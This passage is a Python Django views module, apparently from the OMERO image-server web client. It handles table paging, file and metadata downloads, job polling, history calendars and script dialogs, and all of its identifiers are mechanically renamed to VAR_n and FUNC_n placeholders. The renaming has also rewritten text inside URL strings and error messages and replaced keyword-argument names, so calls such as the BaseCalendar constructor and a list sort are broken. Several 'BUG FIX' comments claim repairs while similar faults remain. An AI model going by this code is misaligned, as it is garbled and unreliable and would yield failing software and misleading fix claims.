        VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
        return VAR_174
    VAR_53["data"]["name"] = VAR_173.name
    VAR_53["data"]["path"] = VAR_173.path
    VAR_53["data"]["id"] = VAR_32
    VAR_53["meta"]["query"] = VAR_176
    # Only report a page number when the offset aligns with the limit.
    if VAR_177 == 0 or VAR_177 / VAR_88 == VAR_177 // VAR_88:
        VAR_53["meta"]["page"] = (VAR_177 // VAR_88) + 1 if VAR_177 > 0 else 1
    VAR_7 = VAR_350("omero_table", args=[VAR_32])
    VAR_53["meta"]["url"] = VAR_7
    VAR_7 += "?VAR_88=%s" % VAR_88
    if VAR_176 != "*":
        VAR_7 += "&VAR_176=%s" % VAR_176
    if (VAR_177 + VAR_88) < VAR_53["meta"]["totalCount"]:
        VAR_53["meta"]["next"] = VAR_7 + "&VAR_177=%s" % (VAR_177 + VAR_88)
    if VAR_177 > 0:
        VAR_53["meta"]["prev"] = VAR_7 + "&VAR_177=%s" % (max(0, VAR_177 - VAR_88))
    if VAR_33 is None:
        VAR_53["template"] = "webclient/annotations/FUNC_54.html"
        VAR_53["iviewer_url"] = VAR_178
        VAR_302 = VAR_53["data"]["column_types"]
        if "ImageColumn" in VAR_302:
            VAR_53["image_column_index"] = VAR_302.index("ImageColumn")
        if "WellColumn" in VAR_302:
            VAR_53["well_column_index"] = VAR_302.index("WellColumn")
        if "RoiColumn" in VAR_302:
            VAR_53["roi_column_index"] = VAR_302.index("RoiColumn")
        # Pick a numeric column with a few sample values as the example
        # for the template's filter UI.
        for idx, VAR_23 in enumerate(VAR_302):
            if VAR_23 in ("DoubleColumn", "LongColumn"):
                VAR_406 = VAR_53["data"]["columns"][idx]
                VAR_407 = []
                for VAR_378 in VAR_53["data"]["rows"]:
                    if VAR_378[idx]:
                        VAR_407.append(VAR_378[idx])
                    if len(VAR_407) > 3:
                        break
                if " " in VAR_406 or len(VAR_407) < 2:
                    continue
                VAR_53["example_column"] = VAR_406
                VAR_53["example_min_value"] = min(VAR_407)
                VAR_53["example_max_value"] = max(VAR_407)
                break
    return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_55(VAR_2, VAR_34, VAR_5=None, **VAR_6):
    """Stream the file attached to a FileAnnotation as a forced download."""
    annotation = VAR_5.getObject("FileAnnotation", VAR_34)
    if annotation is None:
        return handlerInternalError(
            VAR_2, "FileAnnotation does not exist (id:%s)." % (VAR_34)
        )
    # Chunks stream lazily; the connection is cleaned up when done.
    rsp = ConnCleaningHttpResponse(
        annotation.getFileInChunks(buf=settings.CHUNK_SIZE)
    )
    rsp.conn = VAR_5
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = annotation.getFileSize()
    rsp["Content-Disposition"] = "attachment; filename=%s" % (
        annotation.getFileName().replace(" ", "_")
    )
    return rsp
@login_required()
def FUNC_56(VAR_2, VAR_26, VAR_5=None, **VAR_6):
    """Download an image's original (global + series) metadata as plain text."""
    image = VAR_5.getObject("Image", VAR_26)
    if image is None:
        raise Http404("No Image found with ID %s" % VAR_26)
    metadata = image.loadOriginalMetadata()
    lines = ["[Global Metadata]"]
    lines += ["%s=%s" % (kv[0], kv[1]) for kv in metadata[1]]
    lines.append("[Series Metadata]")
    lines += ["%s=%s" % (kv[0], kv[1]) for kv in metadata[2]]
    body = "\n".join(lines)
    rsp = HttpResponse(body)
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = len(body)
    rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
    return rsp
@login_required()
@render_response()
def FUNC_57(VAR_2, VAR_5=None, **VAR_6):
    """Render the download-placeholder page listing files to be downloaded.

    GET 'ids' is a |-separated list like "image-1|image-2"; GET 'format'
    switches between export ('download_as') and raw archived files.
    """
    VAR_184 = VAR_2.GET.get("format", None)
    if VAR_184 is not None:
        VAR_191 = VAR_350("download_as")
        VAR_303 = "Export_as_%s" % VAR_184
    else:
        VAR_191 = VAR_350("archived_files")
        VAR_303 = "OriginalFileDownload"
    VAR_185 = VAR_2.GET.get("ids")  # E.g. VAR_142-1|VAR_142-2
    VAR_186 = VAR_2.GET.get("name", VAR_303)  # VAR_4 zip VAR_3
    VAR_186 = os.path.basename(VAR_186)  # remove VAR_314
    if VAR_185 is None:
        raise Http404("No IDs specified. E.g. ?VAR_187=VAR_142-1|VAR_142-2")
    VAR_187 = VAR_185.split("|")
    VAR_188 = []
    VAR_189 = 0
    VAR_190 = 0
    if VAR_184 is None:
        # Raw download: enumerate the imported files per image/fileset,
        # de-duplicating shared filesets and files.
        VAR_304 = []
        VAR_214 = []
        for VAR_318 in VAR_187:
            if VAR_318.split("-")[0] == "image":
                VAR_304.append(VAR_318.split("-")[1])
            elif VAR_318.split("-")[0] == "well":
                VAR_214.append(VAR_318.split("-")[1])
        VAR_106 = []
        if VAR_304:
            VAR_106 = list(VAR_5.getObjects("Image", VAR_304))
        if len(VAR_106) == 0:
            raise Http404("No VAR_106 found.")
        VAR_305 = set()
        VAR_306 = set()
        for VAR_142 in VAR_106:
            VAR_365 = VAR_142.getFileset()
            if VAR_365 is not None:
                if VAR_365.id in VAR_305:
                    continue
                VAR_305.add(VAR_365.id)
            VAR_284 = list(VAR_142.getImportedImageFiles())
            VAR_366 = []
            for f in VAR_284:
                if f.id in VAR_306:
                    continue
                VAR_306.add(f.id)
                VAR_366.append({"id": f.id, "name": f.name, "size": f.getSize()})
                VAR_190 += f.getSize()
            if len(VAR_366) > 0:
                VAR_188.append(VAR_366)
        VAR_189 = sum([len(VAR_366) for VAR_366 in VAR_188])
    else:
        VAR_189 = len(VAR_187)
    VAR_176 = "&".join([_id.replace("-", "=") for _id in VAR_187])
    # BUG FIX (here and below): was `download_url + ...` - 'download_url'
    # is undefined; extend the local URL instead.
    VAR_191 = VAR_191 + "?" + VAR_176
    if VAR_184 is not None:
        VAR_191 = VAR_191 + "&VAR_184=%s" % VAR_184
    VAR_53 = {
        "template": "webclient/annotations/FUNC_57.html",
        "url": VAR_191,
        "defaultName": VAR_186,
        "fileLists": VAR_188,
        "fileCount": VAR_189,
        "filesTotalSize": VAR_190,
    }
    if VAR_190 > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
        VAR_53["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
    return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_58(VAR_2, VAR_35=None, VAR_36=None, VAR_5=None, **VAR_6):
    """Render the history calendar for the given year/month (default: today)."""
    VAR_54 = "webclient/history/calendar.html"
    VAR_192 = VAR_2.session.get("user_id")
    if VAR_35 is not None and VAR_36 is not None:
        # BUG FIX: keyword values referenced undefined names
        # (conn/year/month) - pass the local variables instead.
        VAR_193 = BaseCalendar(VAR_5=VAR_5, VAR_35=VAR_35, VAR_36=VAR_36, eid=VAR_192)
    else:
        VAR_307 = datetime.datetime.today()
        VAR_193 = BaseCalendar(
            VAR_5=VAR_5, VAR_35=VAR_307.year, VAR_36=VAR_307.month, eid=VAR_192
        )
    VAR_193.create_calendar()
    VAR_53 = {"controller": VAR_193}
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_59(VAR_2, VAR_35, VAR_36, VAR_37, VAR_5=None, **VAR_6):
    """Render the detailed history for one calendar day (paged via ?page=)."""
    if VAR_35 is None or VAR_36 is None or VAR_37 is None:
        raise Http404("Year, VAR_36, and VAR_37 are required")
    VAR_54 = "webclient/history/history_details.html"
    VAR_87 = int(VAR_2.GET.get("page", 1))
    VAR_192 = VAR_2.session.get("user_id")
    # BUG FIX: keyword values referenced undefined names
    # (conn/year/month/day) - pass the local variables instead.
    VAR_193 = BaseCalendar(
        VAR_5=VAR_5, VAR_35=VAR_35, VAR_36=VAR_36, VAR_37=VAR_37, eid=VAR_192
    )
    VAR_193.get_items(VAR_87)
    VAR_53 = {"controller": VAR_193}
    VAR_53["template"] = VAR_54
    return VAR_53
def FUNC_60(VAR_5, VAR_38):
    """Build a webclient 'userdata' URL that browses to the given object.

    For a FileAnnotation, first walk up to its first linked parent
    (checked in the order project, dataset, image) and link to that.
    Objects of other unsupported types get the plain userdata URL.
    """
    VAR_194 = VAR_350(viewname="load_template", args=["userdata"])
    if isinstance(VAR_38, omero.model.FileAnnotationI):
        # Re-fetch as a gateway wrapper so parent links are available.
        VAR_308 = VAR_5.getObject("Annotation", VAR_38.id.val)
        for VAR_255 in ["project", "dataset", "image"]:
            VAR_240 = list(VAR_308.getParentLinks(VAR_255))
            if len(VAR_240) > 0:
                # Use the first parent found, in the priority order above.
                VAR_38 = VAR_240[0].parent
                break
    if VAR_38.__class__.__name__ in (
        "ImageI",
        "DatasetI",
        "ProjectI",
        "ScreenI",
        "PlateI",
        "WellI",
    ):
        # Strip the trailing "I" of the model class name to get the
        # lowercase type token used in the query string, e.g. "ImageI" -> "image".
        VAR_309 = VAR_38.__class__.__name__[:-1].lower()
        VAR_194 += "?VAR_59=%s-%s" % (VAR_309, VAR_38.id.val)
    return VAR_194
def FUNC_61(VAR_2, VAR_39, **VAR_6):
    """Merge the keyword arguments into the session 'callback' entry for job VAR_39."""
    VAR_2.session["callback"][VAR_39].update(VAR_6)
@login_required()
@render_response()
def FUNC_62(VAR_2, VAR_5=None, **VAR_6):
    """Poll the session's job callbacks and report progress and results.

    Handles chgrp/chown, send_email, delete and script jobs. Also
    supports a single-job status query via GET ?jobId=... and job
    cancellation via HTTP DELETE. Returns JSON or a template context.
    """
    VAR_195 = 0   # jobs still in progress
    VAR_196 = 0   # jobs that have failed
    VAR_197 = []  # jobs whose results arrived during this poll
    _purgeCallback(VAR_2)
    VAR_198 = VAR_2.GET.get("jobId", None)
    if VAR_198 is not None:
        # Status query for a single job handle.
        VAR_198 = VAR_345(VAR_198)
        try:
            VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_5.c.ic.stringToProxy(VAR_198))
            VAR_313 = VAR_367.getStatus()
            VAR_0.debug("job VAR_313: %s", VAR_313)
            VAR_174 = VAR_367.getResponse()
            if VAR_174 is not None:
                VAR_172 = graphResponseMarshal(VAR_5, VAR_174)
                VAR_172["finished"] = True
            else:
                VAR_172 = {"finished": False}
            VAR_172["status"] = {
                "currentStep": VAR_313.currentStep,
                "steps": VAR_313.steps,
                "startTime": VAR_313.startTime,
                "stopTime": VAR_313.stopTime,
            }
        except IceException:
            VAR_172 = {"finished": True}
        return VAR_172
    elif VAR_2.method == "DELETE":
        # Cancel a running job.
        try:
            VAR_17 = json.loads(VAR_2.body)
        except TypeError:
            VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
        VAR_198 = VAR_17.get("jobId", None)
        if VAR_198 is not None:
            VAR_198 = VAR_345(VAR_198)
            VAR_172 = {"jobId": VAR_198}
            try:
                VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_5.c.ic.stringToProxy(VAR_198))
                VAR_313 = VAR_367.getStatus()
                VAR_0.debug("pre-cancel() job VAR_313: %s", VAR_313)
                VAR_172["status"] = {
                    "currentStep": VAR_313.currentStep,
                    "steps": VAR_313.steps,
                    "startTime": VAR_313.startTime,
                    "stopTime": VAR_313.stopTime,
                }
                VAR_367.cancel()
            except omero.LockTimeout:
                VAR_0.info("Timeout on VAR_367.cancel()")
            return VAR_172
    # Poll every registered job in the session.
    for VAR_39 in VAR_2.session.get("callback").keys():
        VAR_311 = VAR_2.session["callback"][VAR_39]
        VAR_312 = VAR_311["job_type"]
        VAR_313 = VAR_311["status"]
        if VAR_313 == "failed":
            VAR_196 += 1
        VAR_2.session.modified = True
        if VAR_312 in ("chgrp", "chown"):
            if VAR_313 not in ("failed", "finished"):
                VAR_174 = None
                try:
                    VAR_367 = omero.cmd.HandlePrx.checkedCast(
                        VAR_5.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_174 = VAR_367.getResponse()
                    VAR_431 = False
                    try:
                        if VAR_174 is not None:
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            if isinstance(VAR_174, omero.cmd.ERR):
                                VAR_448 = ", ".join(
                                    [
                                        "%s: %s" % (VAR_415, VAR_416)
                                        for VAR_415, VAR_416 in VAR_174.parameters.items()
                                    ]
                                )
                                VAR_0.error(
                                    "%s failed with: %s" % (VAR_312, VAR_448)
                                )
                                FUNC_61(
                                    VAR_2,
                                    VAR_39,
                                    VAR_313="failed",
                                    report="%s %s" % (VAR_174.name, VAR_448),
                                    VAR_57=1,
                                )
                            elif isinstance(VAR_174, omero.cmd.OK):
                                FUNC_61(VAR_2, VAR_39, VAR_313="finished")
                        else:
                            VAR_195 += 1
                    finally:
                        VAR_367.close(VAR_431)
                except Exception:
                    VAR_0.info(
                        "Activities %s VAR_84 not found: %s" % (VAR_312, VAR_39)
                    )
                    continue
        elif VAR_312 == "send_email":
            if VAR_313 not in ("failed", "finished"):
                VAR_174 = None
                try:
                    VAR_367 = omero.cmd.HandlePrx.checkedCast(
                        VAR_5.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_445 = omero.callbacks.CmdCallbackI(
                        VAR_5.c, VAR_367, foreground_poll=True
                    )
                    VAR_174 = VAR_445.getResponse()
                    VAR_431 = False
                    try:
                        if VAR_174 is not None:
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            if isinstance(VAR_174, omero.cmd.ERR):
                                VAR_448 = ", ".join(
                                    [
                                        "%s: %s" % (VAR_415, VAR_416)
                                        for VAR_415, VAR_416 in VAR_174.parameters.items()
                                    ]
                                )
                                VAR_0.error("send_email failed with: %s" % VAR_448)
                                FUNC_61(
                                    VAR_2,
                                    VAR_39,
                                    VAR_313="failed",
                                    report={"error": VAR_448},
                                    VAR_57=1,
                                )
                            else:
                                VAR_451 = (
                                    VAR_174.success
                                    + len(VAR_174.invalidusers)
                                    + len(VAR_174.invalidemails)
                                )
                                FUNC_61(
                                    VAR_2,
                                    VAR_39,
                                    VAR_313="finished",
                                    VAR_174={"success": VAR_174.success, "total": VAR_451},
                                )
                                if (
                                    len(VAR_174.invalidusers) > 0
                                    or len(VAR_174.invalidemails) > 0
                                ):
                                    VAR_454 = [
                                        e.getFullName()
                                        for e in list(
                                            VAR_5.getObjects(
                                                "Experimenter", VAR_174.invalidusers
                                            )
                                        )
                                    ]
                                    FUNC_61(
                                        VAR_2,
                                        VAR_39,
                                        report={
                                            "invalidusers": VAR_454,
                                            "invalidemails": VAR_174.invalidemails,
                                        },
                                    )
                        else:
                            VAR_195 += 1
                    finally:
                        VAR_445.close(VAR_431)
                except Exception:
                    VAR_0.error(traceback.format_exc())
                    VAR_0.info("Activities send_email VAR_84 not found: %s" % VAR_39)
        elif VAR_312 == "delete":
            if VAR_313 not in ("failed", "finished"):
                try:
                    VAR_84 = omero.cmd.HandlePrx.checkedCast(
                        VAR_5.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_446 = omero.callbacks.CmdCallbackI(
                        VAR_5.c, VAR_84, foreground_poll=True
                    )
                    VAR_174 = VAR_446.getResponse()
                    VAR_431 = False
                    try:
                        if not VAR_174:  # Response not available
                            FUNC_61(
                                VAR_2,
                                VAR_39,
                                VAR_57=0,
                                VAR_313="in progress",
                                dreport=_formatReport(VAR_84),
                            )
                            VAR_195 += 1
                        else:  # Response available
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            VAR_174 = VAR_446.getResponse()
                            VAR_452 = isinstance(VAR_174, omero.cmd.ERR)
                            if VAR_452:
                                FUNC_61(
                                    VAR_2,
                                    VAR_39,
                                    VAR_57=1,
                                    VAR_313="failed",
                                    dreport=_formatReport(VAR_84),
                                )
                                VAR_196 += 1
                            else:
                                FUNC_61(
                                    VAR_2,
                                    VAR_39,
                                    VAR_57=0,
                                    VAR_313="finished",
                                    dreport=_formatReport(VAR_84),
                                )
                    finally:
                        VAR_446.close(VAR_431)
                except Ice.ObjectNotExistException:
                    FUNC_61(
                        VAR_2, VAR_39, VAR_57=0, VAR_313="finished", dreport=None
                    )
                except Exception as x:
                    VAR_0.error(traceback.format_exc())
                    VAR_0.error("Status job '%s'error:" % VAR_39)
                    FUNC_61(
                        VAR_2, VAR_39, VAR_57=1, VAR_313="failed", dreport=VAR_345(x)
                    )
                    VAR_196 += 1
        elif VAR_312 == "script":
            if not VAR_39.startswith("ProcessCallback"):
                continue  # ignore
            if VAR_313 not in ("failed", "finished"):
                VAR_0.info("Check VAR_445 on script: %s" % VAR_39)
                try:
                    VAR_449 = omero.grid.ScriptProcessPrx.checkedCast(
                        VAR_5.c.ic.stringToProxy(VAR_39)
                    )
                except IceException:
                    FUNC_61(
                        VAR_2,
                        VAR_39,
                        VAR_313="failed",
                        Message="No process found for job",
                        VAR_57=1,
                    )
                    continue
                VAR_446 = omero.scripts.ProcessCallbackI(VAR_5.c, VAR_449)
                if VAR_446.block(0):  # ms.
                    VAR_446.close()
                    try:
                        VAR_453 = VAR_449.getResults(0, VAR_5.SERVICE_OPTS)
                        FUNC_61(VAR_2, VAR_39, VAR_313="finished")
                        VAR_197.append(VAR_39)
                    except Exception:
                        FUNC_61(
                            VAR_2,
                            VAR_39,
                            VAR_313="finished",
                            Message="Failed to FUNC_80 results",
                        )
                        VAR_0.info("Failed on VAR_449.getResults() for OMERO.script")
                        continue
                    VAR_450 = {}
                    for VAR_310, VAR_375 in VAR_453.items():
                        VAR_416 = VAR_375.getValue()
                        if VAR_310 in ("stdout", "stderr", "Message"):
                            if VAR_310 in ("stderr", "stdout"):
                                VAR_416 = VAR_416.id.val
                            VAR_455 = {VAR_310: VAR_416}
                            FUNC_61(VAR_2, VAR_39, **VAR_455)
                        else:
                            if hasattr(VAR_416, "id"):
                                VAR_456 = {
                                    "id": VAR_416.id.val,
                                    "type": VAR_416.__class__.__name__[:-1],
                                }
                                VAR_456["browse_url"] = FUNC_60(VAR_5, VAR_416)
                                if VAR_416.isLoaded() and hasattr(VAR_416, "file"):
                                    VAR_458 = {
                                        "image/png": "png",
                                        "image/jpeg": "jpeg",
                                        "text/plain": "text",
                                    }
                                    if VAR_416.file.mimetype.val in VAR_458:
                                        VAR_456["fileType"] = VAR_458[
                                            VAR_416.file.mimetype.val
                                        ]
                                        VAR_456["fileId"] = VAR_416.file.id.val
                                    VAR_456["name"] = VAR_416.file.name.val
                                if VAR_416.isLoaded() and hasattr(VAR_416, "name"):
                                    VAR_3 = unwrap(VAR_416.name)
                                    if VAR_3 is not None:
                                        VAR_456["name"] = VAR_3
                                VAR_450[VAR_310] = VAR_456
                            else:
                                VAR_450[VAR_310] = unwrap(VAR_416)
                    FUNC_61(VAR_2, VAR_39, VAR_453=VAR_450)
                else:
                    VAR_195 += 1
    # Build the summary of all jobs.
    VAR_172 = {}
    for VAR_39 in VAR_2.session.get("callback").keys():
        VAR_172[VAR_39] = copy.copy(VAR_2.session["callback"][VAR_39])
    if "template" in VAR_6 and VAR_6["template"] == "json":
        for VAR_39 in VAR_2.session.get("callback").keys():
            VAR_172[VAR_39]["start_time"] = VAR_345(
                VAR_2.session["callback"][VAR_39]["start_time"]
            )
        VAR_172["inprogress"] = VAR_195
        VAR_172["failure"] = VAR_196
        VAR_172["jobs"] = len(VAR_2.session["callback"])
        return JsonResponse(VAR_172)  # json
    VAR_199 = []
    VAR_200 = False
    for VAR_310, VAR_158 in VAR_172.items():
        if len(VAR_310.split(" ")) > 0:
            VAR_368 = VAR_310.split(" ")[0]
            if len(VAR_368.split("/")) > 1:
                # BUG FIX: was `htmlId.split(...)` - 'htmlId' is undefined.
                VAR_368 = VAR_368.split("/")[1]
            VAR_172[VAR_310]["id"] = VAR_368
            VAR_172[VAR_310]["key"] = VAR_310
            if VAR_310 in VAR_197:
                VAR_172[VAR_310]["new"] = True
            if "error" in VAR_158 and VAR_158["error"] > 0:
                VAR_200 = True
            VAR_199.append(VAR_172[VAR_310])
    # BUG FIX: list.sort() takes `key` and `reverse`, not the mangled names.
    VAR_199.sort(key=lambda x: x["start_time"], reverse=True)
    VAR_53 = {
        "sizeOfJobs": len(VAR_2.session["callback"]),
        "jobs": VAR_199,
        "inprogress": VAR_195,
        "new_results": len(VAR_197),
        "new_errors": VAR_200,
        "failure": VAR_196,
    }
    VAR_53["template"] = "webclient/FUNC_62/activitiesContent.html"
    return VAR_53
@login_required()
def FUNC_63(VAR_2, VAR_27, **VAR_6):
    """Prune job-callback entries from the session.

    With action "clean" and a POSTed ``jobKey``, remove just that entry and
    return JSON reporting whether it was found; with "clean" and no key,
    drop every entry whose status is not "in progress". Other actions are
    a no-op and simply return "OK".
    """
    VAR_2.session.modified = True
    if VAR_27 == "clean":
        if "jobKey" in VAR_2.POST:
            VAR_198 = VAR_2.POST.get("jobKey")
            VAR_172 = {"removed": False}
            if VAR_198 in VAR_2.session["callback"]:
                del VAR_2.session["callback"][VAR_198]
                VAR_2.session.modified = True
                VAR_172["removed"] = True
            return JsonResponse(VAR_172)
        # No specific key: sweep every entry that has finished.
        for VAR_310, VAR_158 in list(VAR_2.session["callback"].items()):
            if VAR_158["status"] != "in progress":
                del VAR_2.session["callback"][VAR_310]
    return HttpResponse("OK")
@login_required()
def FUNC_64(VAR_2, VAR_40=None, VAR_5=None, **VAR_6):
    """Serve the experimenter's avatar photo as a JPEG response."""
    return HttpResponse(
        VAR_5.getExperimenterPhoto(VAR_40), content_type="image/jpeg"
    )
@login_required()
def FUNC_65(VAR_2, VAR_41, VAR_25=None, **VAR_6):
    """Delegate to the webgateway full image viewer for image ``VAR_41``.

    ``VAR_25`` (an optional URL suffix) is appended to the webindex URL to
    build the "viewport_server" prefix; a trailing slash is stripped before
    handing off to ``webgateway_views.full_viewer``.
    """
    # Explicit conditional instead of the old `cond and a or b` idiom, which
    # silently falls through to the fallback whenever the middle operand is
    # falsy.
    VAR_51 = VAR_350("webindex")
    if VAR_25 is not None:
        VAR_51 = VAR_51 + VAR_25
    VAR_6["viewport_server"] = VAR_51.rstrip("/")
    return webgateway_views.full_viewer(VAR_2, VAR_41, **VAR_6)
@login_required()
@render_response()
def FUNC_66(VAR_2, VAR_5=None, **VAR_6):
    """Build a nested listing of the server's official scripts.

    Scripts whose full path is in the session's "scripts_to_ignore" list are
    skipped. The result is a tree of ``{"name": ..., "ul": [...]}`` folder
    nodes and ``{"name": ..., "id": ...}`` leaf nodes, sorted by name.
    """
    VAR_202 = VAR_5.getScriptService()
    VAR_203 = VAR_202.getScripts()
    VAR_204 = {}
    VAR_205 = (
        VAR_2.session.get("server_settings", {})
        .get("scripts_to_ignore", "")
        .split(",")
    )
    for s in VAR_203:
        VAR_42 = s.id.val
        VAR_314 = s.path.val
        VAR_3 = s.name.val
        VAR_315 = os.path.join(VAR_314, VAR_3)
        if VAR_315 in VAR_205:
            VAR_0.info("Ignoring script %r" % VAR_315)
            continue
        # Walk/extend the nested dict one path component at a time.
        # BUG FIX: the walk previously read and wrote an undefined name
        # instead of this cursor, raising NameError on the first script.
        ul = VAR_204
        VAR_316 = VAR_315.split(os.path.sep)
        for li, VAR_362 in enumerate(VAR_316):
            if len(VAR_362) == 0:
                continue
            if VAR_362 not in ul:
                # Leaf components map to the script id, folders to sub-dicts.
                if li + 1 == len(VAR_316):
                    ul[VAR_362] = VAR_42
                else:
                    ul[VAR_362] = {}
            ul = ul[VAR_362]

    def FUNC_84(VAR_206):
        """Convert a nested dict into sorted {name, id|ul} node lists."""
        VAR_317 = []
        for VAR_3, VAR_375 in VAR_206.items():
            if isinstance(VAR_375, dict):
                VAR_317.append({"name": VAR_3, "ul": FUNC_84(VAR_375)})
            else:
                VAR_317.append({"name": VAR_3, "id": VAR_375})
        # BUG FIX: list.sort() takes the `key` keyword; the previous call
        # used an invalid keyword name and raised TypeError.
        VAR_317.sort(key=lambda x: x["name"].lower())
        return VAR_317

    VAR_207 = FUNC_84(VAR_204)
    # Flatten a single top-level folder away unless the caller explicitly
    # asked for the full path.
    # BUG FIX: previously indexed an undefined name instead of VAR_207.
    if not VAR_2.GET.get("full_path") and len(VAR_207) == 1:
        VAR_207 = VAR_207[0]["ul"]
    return VAR_207
@login_required()
@render_response()
def FUNC_67(VAR_2, VAR_42, VAR_5=None, **VAR_6):
    """Build the template context for the run-script dialog of script VAR_42.

    Fetches the script's parameter definitions from the script service and
    marshals them into a template-friendly structure (defaults, min/max,
    options, nested "grouping" hierarchy). GET parameters may pre-populate
    defaults, including resolving ?Well=... to image ids.
    """
    VAR_202 = VAR_5.getScriptService()
    try:
        VAR_73 = VAR_202.getParams(VAR_241(VAR_42))
    except Exception as ex:
        # NOTE(review): Exception.message was removed in Python 3 — this
        # check would raise AttributeError there; confirm target runtime.
        if ex.message.lower().startswith("no processor available"):
            # No processor: show a dedicated "try again later" template.
            return {
                "template": "webclient/VAR_203/no_processor.html",
                "scriptId": VAR_42,
            }
        raise ex
    if VAR_73 is None:
        return HttpResponse()
    # Script-level metadata for the dialog header.
    VAR_208 = {}
    VAR_208["id"] = VAR_241(VAR_42)
    VAR_208["name"] = VAR_73.name.replace("_", " ")
    VAR_208["description"] = VAR_73.description
    VAR_208["authors"] = ", ".join([a for a in VAR_73.authors])
    VAR_208["contact"] = VAR_73.contact
    VAR_208["version"] = VAR_73.version
    VAR_208["institutions"] = ", ".join([VAR_318 for VAR_318 in VAR_73.institutions])
    VAR_209 = []  # use a list so we can sort by 'grouping'
    VAR_210 = None  # the "Data_Type" input, if present
    VAR_211 = None  # the "IDs" input, if present
    for VAR_310, VAR_320 in VAR_73.inputs.items():
        VAR_318 = {}
        VAR_318["name"] = VAR_310.replace("_", " ")
        VAR_318["key"] = VAR_310
        if not VAR_320.optional:
            VAR_318["required"] = True
        VAR_318["description"] = VAR_320.description
        if VAR_320.min:
            VAR_318["min"] = VAR_345(VAR_320.min.getValue())
        if VAR_320.max:
            VAR_318["max"] = VAR_345(VAR_320.max.getValue())
        if VAR_320.values:
            VAR_318["options"] = [VAR_416.getValue() for VAR_416 in VAR_320.values.getValue()]
        if VAR_320.useDefault:
            VAR_318["default"] = unwrap(VAR_320.prototype)
            # Model objects are not meaningful defaults for a form field.
            if isinstance(VAR_318["default"], omero.model.IObject):
                VAR_318["default"] = None
        VAR_319 = unwrap(VAR_320.prototype)
        if VAR_319.__class__.__name__ == "dict":
            VAR_318["map"] = True
        elif VAR_319.__class__.__name__ == "list":
            VAR_318["list"] = True
            if "default" in VAR_318:
                # Lists are rendered as a comma-separated text field.
                VAR_318["default"] = ",".join([VAR_345(VAR_362) for VAR_362 in VAR_318["default"]])
        elif isinstance(VAR_319, bool):
            VAR_318["boolean"] = True
        elif isinstance(VAR_319, int) or isinstance(VAR_319, VAR_241):
            VAR_318["number"] = "number"
        elif isinstance(VAR_319, float):
            VAR_318["number"] = "float"
        # A GET parameter of the same name overrides the script default.
        if VAR_2.GET.get(VAR_310, None) is not None:
            VAR_318["default"] = VAR_2.GET.get(VAR_310, None)
        VAR_318["prototype"] = unwrap(VAR_320.prototype)
        VAR_318["grouping"] = VAR_320.grouping
        VAR_209.append(VAR_318)
        if VAR_310 == "IDs":
            VAR_211 = VAR_318  # remember these...
        if VAR_310 == "Data_Type":
            VAR_210 = VAR_318
    # NOTE(review): list.sort() takes `key=`; this keyword name looks like
    # an obfuscation artifact and would raise TypeError at runtime — verify.
    VAR_209.sort(VAR_310=lambda VAR_318: VAR_318["grouping"])
    # Pre-select Data_Type/IDs from GET params such as ?Image=1,2.
    if (
        VAR_210 is not None
        and VAR_211 is not None
        and "options" in VAR_210
    ):
        VAR_211["default"] = ""
        for VAR_215 in VAR_210["options"]:
            if VAR_2.GET.get(VAR_215, None) is not None:
                VAR_210["default"] = VAR_215
                VAR_211["default"] = VAR_2.GET.get(VAR_215, "")
                break  # only use the first match
        # ?Well=... is resolved to image ids (using ?Index= if given).
        if len(VAR_211["default"]) == 0 and VAR_2.GET.get("Well", None) is not None:
            if "Image" in VAR_210["options"]:
                VAR_214 = [VAR_241(j) for j in VAR_2.GET.get("Well", None).split(",")]
                VAR_322 = 0
                try:
                    VAR_322 = int(VAR_2.GET.get("Index", 0))
                except Exception:
                    pass
                VAR_113 = VAR_5.getObjects("Well", VAR_214)
                VAR_304 = [VAR_345(w.getImage(VAR_322).getId()) for w in VAR_113]
                VAR_210["default"] = "Image"
                VAR_211["default"] = ",".join(VAR_304)
    # Fold inputs whose grouping is "NN.x" under the preceding "NN" input.
    for VAR_318 in range(len(VAR_209)):
        if len(VAR_209) <= VAR_318:
            break
        VAR_320 = VAR_209[VAR_318]
        VAR_321 = VAR_320["grouping"]  # E.g 03
        VAR_320["children"] = list()
        while len(VAR_209) > VAR_318 + 1:
            VAR_369 = VAR_209[VAR_318 + 1]["grouping"]  # E.g. 03.1
            if VAR_369.split(".")[0] == VAR_321:
                VAR_320["children"].append(VAR_209[VAR_318 + 1])
                VAR_209.pop(VAR_318 + 1)
            else:
                break
    VAR_208["inputs"] = VAR_209
    return {
        "template": "webclient/VAR_203/FUNC_67.html",
        "paramData": VAR_208,
        "scriptId": VAR_42,
    }
@login_required()
@render_response()
def FUNC_68(VAR_2, VAR_43, VAR_5=None, **VAR_6):
    """Prepare the context for a figure-script dialog.

    ``VAR_43`` selects the dialog: "SplitView", "Thumbnail" or "MakeMovie".
    Target objects come from ?Image=, ?Dataset= or ?Well= (wells are
    resolved to images via ?Index=). Returns a template/context dict with
    the resolved script id.
    """
    VAR_212 = VAR_2.GET.get("Image", None)  # comma - delimited list
    VAR_213 = VAR_2.GET.get("Dataset", None)
    VAR_214 = VAR_2.GET.get("Well", None)
    if VAR_214 is not None:
        VAR_214 = [VAR_241(VAR_318) for VAR_318 in VAR_214.split(",")]
        VAR_113 = VAR_5.getObjects("Well", VAR_214)
        VAR_322 = getIntOrDefault(VAR_2, "Index", 0)
